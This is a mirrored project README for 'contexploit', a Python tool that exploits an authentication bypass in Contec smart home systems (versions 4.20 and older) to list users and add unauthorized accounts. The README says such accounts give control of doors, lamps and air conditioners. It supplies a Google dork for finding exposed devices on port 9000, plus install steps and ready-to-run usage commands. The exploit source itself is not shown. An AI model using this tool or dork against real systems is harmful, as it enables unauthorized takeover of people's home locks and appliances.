Giter VIP home page Giter VIP logo

contexploit's Introduction

User Agreement

Developers assume no liability and are not responsible for any misuse or damage caused by this program

Vulnerability description

the Vulnerability allow unauthenticated attacker to remotely bypass authentication and added new user without confirming.
after Successfully added new users, the attacker can control anything (lamps, doors, air conditioner, etc)

Contec smart home Unauthorized Users Added

  • Affected version : 4.20 and older.

  • Google dork:

inurl:":9000" intitle:"Contec Intelligent Housing"

want to know more about Contec Smart Home system ?

Installation steps

  • require 2 modules (bs4, requests)
Root@Linux: ~# pip install -r requirements.txt  

or

Root@Linux: ~# pip install bs4 requests  
  • Work in both python 2.x and 3.x
  • Tested on Windows Linux and MAC os

Usage

to view users list:

Root@Linux: ~# python ./contexploit.py -t http://<ip>:<port> --list-user  

to added new user:

Root@Linux: ~# python ./contexploit.py -t http://<ip>:<port> -u <NewUser> -p <NewPassword>   

help:

Root@Linux: ~# python contexploit.py --help
usage: python contexploit.py -t http://<ip>:<port> --list-user

Contec smart home Unauthorized Users Added. (Affected version : 4.15)

optional arguments:
-h, --help              show this help message and exit
-v, --version           Show version and exit
-t, --target            Target address (e.g. http://<ip>:<port>)
-l, --list-user         Grap all user list on the web server
-u, --new-user          New username
-p, --new-password      New password

contexploit's People

Contributors

kuburan avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.